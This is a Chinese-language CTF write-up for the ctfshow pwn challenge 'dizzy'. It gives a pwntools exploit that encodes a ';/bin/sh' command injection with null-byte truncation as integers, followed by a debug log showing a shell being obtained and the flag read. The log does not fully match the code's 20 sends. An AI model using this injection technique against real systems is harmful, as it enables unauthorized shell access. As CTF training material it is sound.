ida:
这题考察的是命令;分隔后前半段是错误的后面的仍可执行
还有字符串是用\x00截断的
但主要的是要看懂程序的检查机制
exp:
from pwn import *
context.log_level="debug"
io=remote("pwn.challenge.ctf.show", 28164)
elf=ELF("./dizzy")
s="PvvN| 1S S0 GREAT!;/bin/sh".ljust(80,"\x00")
arr=[]
for i in range(0,len(s),4):
tmp=hex(ord(s[i+3]))[2:].zfill(2)
tmp+= hex(ord(s[i + 2]))[2:].zfill(2)
tmp+= hex(ord(s[i + 1]))[2:].zfill(2)
tmp+= hex(ord(s[i + 0]))[2:].zfill(2)
arr.append(int(tmp,16))
for i in range(len(arr)):
arr[i]-=0x1BF52
for i in range(20):
io.sendline(str(arr[i]))
io.interactive()
io.sendline(str(arr[i]))
[DEBUG] Sent 0xb bytes:
b'1316271870\n'
[DEBUG] Sent 0xb bytes:
b'1395613994\n'
[DEBUG] Sent 0xa bytes:
b'539923406\n'
[DEBUG] Sent 0xb bytes:
b'1094947573\n'
[DEBUG] Sent 0xa bytes:
b'792289794\n'
[DEBUG] Sent 0xa bytes:
b'795650576\n'
[DEBUG] Sent 0x7 bytes:
b'-87775\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[*] Switching to interactive mode
[DEBUG] Received 0x2c bytes:
b'sh: 1: PvvN: not found\n'
b'sh: 1: 1S: not found\n'
sh: 1: PvvN: not found
sh: 1: 1S: not found
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2e bytes:
b'ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}\n'
ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}
$